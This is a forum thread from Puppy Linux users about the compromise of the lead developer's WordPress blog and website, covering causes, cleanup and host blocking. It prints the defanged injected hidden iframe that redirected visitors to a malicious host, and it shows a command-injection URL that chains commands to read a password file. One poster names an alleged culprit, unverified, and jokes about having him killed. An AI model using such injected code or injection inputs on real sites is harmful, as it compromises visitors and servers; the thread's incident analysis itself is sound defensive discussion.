Serious security breach on Developer Blog

News, happenings
Post Reply
Message
Author
User avatar
BarryK
Puppy Master
Posts: 9392
Joined: Mon 09 May 2005, 09:23
Location: Perth, Western Australia
Contact:

Serious security breach on Developer Blog

#1 Post by BarryK »

I went to my blog this morning and got redirected to another site. My PC became very busy, mouse response extremely slow. I managed to kill SeaMonkey.

I FTP'd to my site and found that two files, blog/index.php and blog/wp-blog-header.php have been modified. I have restored the originals.

The big question is, how could someone do that?

I have raised a ticket with servage and asked them that question.

Note, I've turned off comments on my blog, but there were no suspicious comments anyway.
[url]https://bkhome.org/news/[/url]

User avatar
veronicathecow
Posts: 559
Joined: Sat 21 Oct 2006, 09:41

#2 Post by veronicathecow »

Hi Barry sorry to hear of this problem. My first thought is "Any chance" that your machine has been compromised" Secondly was, perhaps it's time to see if there is need to tighten up Puppy security? (It may have been on the server from their side but it looks as though it was making a good stab at taking over your PC.)
Perhaps now things like the Asus eeePC are getting sold in volume and firfox is becoming more powerful that the forces of darkness will be taking an interest a deeper interest in opensource
Cheers
Tony

John Doe
Posts: 1681
Joined: Mon 01 Aug 2005, 04:46
Location: Michigan, US

#3 Post by John Doe »

I just PM'd this to Barry, before I noticed the thread here.

You're all welcome to read it.

Regarding the page change:

Wordpress 2.3 Cross Domain Content Insertion- New vulnerability + exploit - xssworm.com
http://seclists.org/fulldisclosure/2007/Nov/0336.html

Regarding the one comment that go through the other day I had signed up to post what follows this link. In the mean time I did some further research and found it was probably SQL injection.

Wordpress 2.3.1 Charset SQL Injection Vulnerability
http://blogsecurity.net/wordpress/wordp ... erability/

---

Your security implementation is probably adequate. There are three methods which could be used to create such spam that came to mind when I read your post.

1-an exploit in the WordPress code to bypass the security layers. If you examine your http logs for the request that created the comment it might tell you if this was the method used. Also it would allow you to notify the WordPress creators so they could fix the problem. You could gather, at a minimum, the page that was used to implement the exploit. If a 'get' post was used, you might be able to further identify the query string which would help the coders diagnose the problem faster.

2-a server level database permission issue that allowed another user or site on the same server to insert an entry directly to your database. This would be impractical for spammers, as they would have to pay for accounts on lots of servers and hope a majority or the admins had a weak understanding of security.

3-an sql injection vulnerability in the registration form, the login form or the search form. the login form and search form queries shouldn't use a user that has insert permissions anyway, so maybe the registration form. this would depend on what permissions to which tables the user account that it queried as were given. if that user doesn't have permission to insert to the comment table in the database, it's not this.

User avatar
MU
Posts: 13649
Joined: Wed 24 Aug 2005, 16:52
Location: Karlsruhe, Germany
Contact:

#4 Post by MU »

I had a comparable problem not long ago.
Using gftp I could see, that the problem came from a newsletter-module of I think PHPBB.
It seems that a weak point was taken to install a spam-mailer.
You could see it by analyzing how the folders around it got infected by new PHP-Scripts.

One concrete example:

if you have such code:
thecommand = $GET["whatnext"];
system($thecommand);

So you would call a website like this:
http://xyt.com/index.php?whatnext=ls

Then the string "ls" would be passed to index.php
It then is executed by "system".
Now the attack would be to pass your own string, like:
http://xyt.com/index.php?whatnext=ls;cd;cd ..;cd ..;cd etc;cat passwords

You might have to replace some chars with HTML-entities like %20 instead of spaces.
This is a very obvious vulnerability, there are more advanced as said by John Doe.

And software IS buggy.
We had the example of a commercial boardsystem, where you registered as new user with restrictions, and then until you did not log in to your account, had access to all boards, even those that are usually just allowed to be viewed by administrators.

Mark

User avatar
BarryK
Puppy Master
Posts: 9392
Joined: Mon 09 May 2005, 09:23
Location: Perth, Western Australia
Contact:

#5 Post by BarryK »

Looking around my site with gFTP, I quickly discovered that my entire site had been hacked.

This covers goosee.com as well as puppylinux.com, each in it's own subdirectory.

I contacted servage, they replied that I should change my password, and make sure that all directories are 755, and all files 644.

So, I went through, making sure all permissions are okay, uploading the original files when I found a hacked one. But, the thing is, static html pages in 755 directory with 644 permission were also hacked.

I did have a lot of html files with 755, and I did notice a preference by the hacker to hack those. But it doesn't explain how 644 files got hacked. I've sent a message to servage asking how that could happen.

Right now, I'm nervously watching my site to see if anything more happens to it.

There seem to be two different types of hack, one that occurred on Jan 10th, which has injected porno links into some pages. Then the one that I found, a massive hack of my site on Jan 12th, which has inserted redirection code. I'll put the site that I got redirected to, but don't go there!!! Maybe someone can work out what this site does or attempts to do. This is my hacked blog/index.php, but I have inserted some capitalisation to disable it:

Code: Select all

<?php
/* Short and sweet */
define('WP_USE_THEMES', true);
require('./wp-blog-headerDOTphp');
?><iframe src="httpCOLON//orentraffDOTcn/tdsbear/indexDOTphp?out=1199657524" width="0" height="0" style="display:none"></iframe>
[url]https://bkhome.org/news/[/url]

wingruntled

#6 Post by wingruntled »

Barry
Not to sound like an idiot, but. This is old news.
You were hacked last year but never got the message.
http://murga-linux.com/puppy/viewtopic.php?t=23724

John Doe
Posts: 1681
Joined: Mon 01 Aug 2005, 04:46
Location: Michigan, US

#7 Post by John Doe »

I got the name of who is responsible already.

Mahmod AbdAllah el Gashmi

He lives in Turkey. Just say the word Barry and I'll have him killed. 8)

He's mentioned on this page:
http://spamtrackers.eu/wiki/index.php?t ... acked_host

I'll post how I figured that out in a bit. I have to go get my nightly brew.

Caneri
Posts: 1513
Joined: Tue 04 Sep 2007, 13:23
Location: Canada

#8 Post by Caneri »

Well..it looks like puppylinux.ca is also down.

My IP address will not resolve to my domain.

My tech guys are working on this problem but may be until tomorrow before I get an answer.

Sorry all.

Eric
[color=darkred][i]Be not afraid to grow slowly, only be afraid of standing still.[/i]
Chinese Proverb[/color]

John Doe
Posts: 1681
Joined: Mon 01 Aug 2005, 04:46
Location: Michigan, US

#9 Post by John Doe »

Ok, I used wget to request the url Barry posted without using the query string and got a simple file that looks like a login form (it's attached as index.php.txt).

Then I used wget to request the url with the query string and got the following pertinent information (the whole dialog is attached as wget-response.txt):

HTTP request sent, awaiting response... 302 Found
Location: httpCOLON//88.255.94.114/~usersonli/oren/indexDOTphp [following]
Connecting to 88.255.94.114:80... failed: Bad file descriptor.

Using the ip address I looked up the owner via whois.ripe.net. It's that guy I mentioned above (info in whois.ripe.net.txt).

The most interesting part was "Bad file descriptor", that's why your browser froze up. I'm assuming it's some sort of exploit for IE that installs his root kit, which is mentioned at the following post:
http://www.bluetack.co.uk/forums/index. ... entry85109

What a piece of trash. :evil:
Attachments
files.tar
Text Files are in the TarBall
(8 KiB) Downloaded 1282 times

Caneri
Posts: 1513
Joined: Tue 04 Sep 2007, 13:23
Location: Canada

#10 Post by Caneri »

I'm not sure if this is related or not.

http://www.internetnews.com/security/ar ... hp/3712071

Eric
[color=darkred][i]Be not afraid to grow slowly, only be afraid of standing still.[/i]
Chinese Proverb[/color]

John Doe
Posts: 1681
Joined: Mon 01 Aug 2005, 04:46
Location: Michigan, US

#11 Post by John Doe »

Caneri wrote:I'm not sure if this is related or not.
it's all related somehow :)

cool read, thanks for the link (hopefully it wasn't one of them :!: )

User avatar
BarryK
Puppy Master
Posts: 9392
Joined: Mon 09 May 2005, 09:23
Location: Perth, Western Australia
Contact:

#12 Post by BarryK »

Okay, if it's an exploit for IE, then likely not targetting Linux and wouldn't have compromised my PC...

Anyway, I think I know how my site was violated. Well, not really 'how', just the basic outline.

My site has had two violations, one dated Jan 10, the second on Jan 12. Well, you might have seen my recent blog post "The spam that got through" - that was Jan 10. Then, last night - Jan 12 - there was another one. That's two of them, corresponding with my site violations.

So, my confidence in WordPress has hit rock bottom. Even if I do upgrade, it seems to be a never ending battle. I've turned off comments - and 'flagman' posted a comment immediately after! Globally turning off comments only affects new posts! Yikes, I hunted through the prefs and there's nothing to globally turn off comments!!!

So, I used the "bad words" filter to block everything - how crude.
[url]https://bkhome.org/news/[/url]

User avatar
Previously known as Guest
Posts: 240
Joined: Thu 29 Sep 2005, 00:39

#13 Post by Previously known as Guest »

As I've had an ongoing issue with servage & pkagfiles, one of their "fixes" was to move the account to another datacenter & change ALL permissions (directory & file) to 777! Not the brightest bunch it seems.

I've had problems with permissions in the past! 403 errors for no reason.

Also it seems they outsource their tech support to India. I will look further into it & probably relocate pkagfiles to another host.

pkagfiles is currently working, but am watching closely for issues that may arise & will adjust, take offline if needed.

Sorry for any inconveniences.

Ron AKA PkaG.

User avatar
Lobster
Official Crustacean
Posts: 15522
Joined: Wed 04 May 2005, 06:06
Location: Paradox Realm
Contact:

#14 Post by Lobster »

:(

I have a Wordpress blog (rarely post to it)
Had to turn off the comments due to corrective medication for penile dysfunction and porn spam
http://tmxxine.com/wordpress/

corrective medication for penile dysfunction = via***
I can not use the word via*** as Johns efforts to fight the mal merchants changes the word to "poisonous crap"

Look how hard John and Flash work to stop spam
(and it still gets through . . . )

It makes sense for spammers to code bots for popular services
and Wordpress is the top blogging tool.
http://www.honeynet.org/papers/bots/botnet-code.html

We have the word "Puppy" come up with Puppy Linux in Google
Therefore owning that or hijacking it is a commercial decision.

An attack is inconvenient, annoying and also can make one paranoid
(as if it is a personal attack) :?

It is important to maintain ones psychological perspective
when this sort of situation occurs
(I am occasionally sane enough to recognise that) :shock:

So far the solution seems right:
  • 1. Exposing and dealing with the situation
    2. Notifying and working with the software and server providers
When the Puppy wiki was attacked with spam bots
rather than change to new software
Raffy hardened the existing software
and even though users have to register
many did and some regular users are making
many useful contributions :)

Related to spam is the use of gmail to filter
(not ideal but no solution is)

Just remember there is a protective cordon of expertise
around Puppy. How this situation is dealt with is indicative
of a growing maturity. Do we stay in place and fight our corner
or run to a new solution
(with attendant problems)?

Good luck. 8)
Last edited by Lobster on Tue 05 Feb 2008, 04:45, edited 1 time in total.
Puppy Raspup 8.2Final 8)
Puppy Links Page http://www.smokey01.com/bruceb/puppy.html :D

User avatar
Previously known as Guest
Posts: 240
Joined: Thu 29 Sep 2005, 00:39

#15 Post by Previously known as Guest »

Previously known as Guest wrote:As I've had an ongoing issue with servage & pkagfiles, one of their "fixes" was to move the account to another datacenter & change ALL permissions (directory & file) to 777! Not the brightest bunch it seems.

I've had problems with permissions in the past! 403 errors for no reason.

Also it seems they outsource their tech support to India. I will look further into it & probably relocate pkagfiles to another host.

pkagfiles is currently working, but am watching closely for issues that may arise & will adjust, take offline if needed.

Sorry for any inconveniences.

Ron AKA PkaG.
Interestingly within a few minutes of this post an attack started from:
84.221.65.76 [host-84-221-65-76.cust-adsl.tiscali.it]
80.186.120.215 [a80-186-120-215.elisa-laajakaista.fi]

Maybe I'll start posting fscking IP's involved again! I could write a novel of IP addresses. :shock:

Sage
Posts: 5536
Joined: Tue 04 Oct 2005, 08:34
Location: GB

#16 Post by Sage »

No respite, either:
http://www.theregister.co.uk/2008/01/11 ... infection/
This is looking like a battle of intellects.

User avatar
dvw86
Posts: 636
Joined: Thu 05 May 2005, 00:55
Location: Washington State

#17 Post by dvw86 »

Barry,
You may want to read this blog post by Arnold Kim.
http://normalkid.com/2007/11/20/
Arnold (Arn) is the creator of macrumors.com. It is a very popular rumor and news site focusing on the Apple computer company. He has had many similar issues with PHP based sites including Word Press. His final solution was to use vBulletin, which he has been happy with. Some samples of his post reguarding Word Press include the following.
Wordpress Sucks, and Other Thoughts (Including Why I’m on Default Theme)
The problem was that there were known exploits in every version… and it was like holding up a sign to anyone out there to “Please Hack Me

User avatar
prehistoric
Posts: 1744
Joined: Tue 23 Oct 2007, 17:34

adding insult to injury

#18 Post by prehistoric »

@John Doe,

When I tried to notify a friend, (retired sys admin,) about that European site, his ISP identified the message as spam or a virus. This was a short, hand-typed, text-only message with no attachments. (I suppose I should have used a sophisticated method of hiding content, like ROT13.)

When the message bounced I got a message from my ISP advising me I had sent contaminated mail and to tell their Postmaster if there had been an error. When I did as requested, that message was also rejected because the Postmaster mail box was full.

I think I finally got the message through by splitting the offending text and telling the recipient how to reassemble it. (Wait, let me check for another bounce.)

Aren't ISPs helpful in these situations?

prehistoric

User avatar
willhunt
Posts: 495
Joined: Wed 05 Oct 2005, 18:19

#19 Post by willhunt »

how do I ban this ip so my machine won;t even go to that IP?
[url=http://hostfile.org/icepak.pet]176 Icewm Themes :!:[/url]
[url=http://tinyurl.com/39fl3x]vlc-0.8.6c-i586.pet[/url]
[url=http://tinyurl.com/2q7cbp]vlc-0.8.6c-i586.pet[/url]

wingruntled

#20 Post by wingruntled »

willhunt
you could add the IP address hosts name to your /etc/hosts file.
Just edit to the END of your hosts file with the last two lines as I posted below:

127.0.0.1 localhost puppypc

Code: Select all

127.0.0.1  host-84-221-65-76.cust-adsl.tiscali.it
127.0.0.1  a80-186-120-215.elisa-laajakaista.fi

Post Reply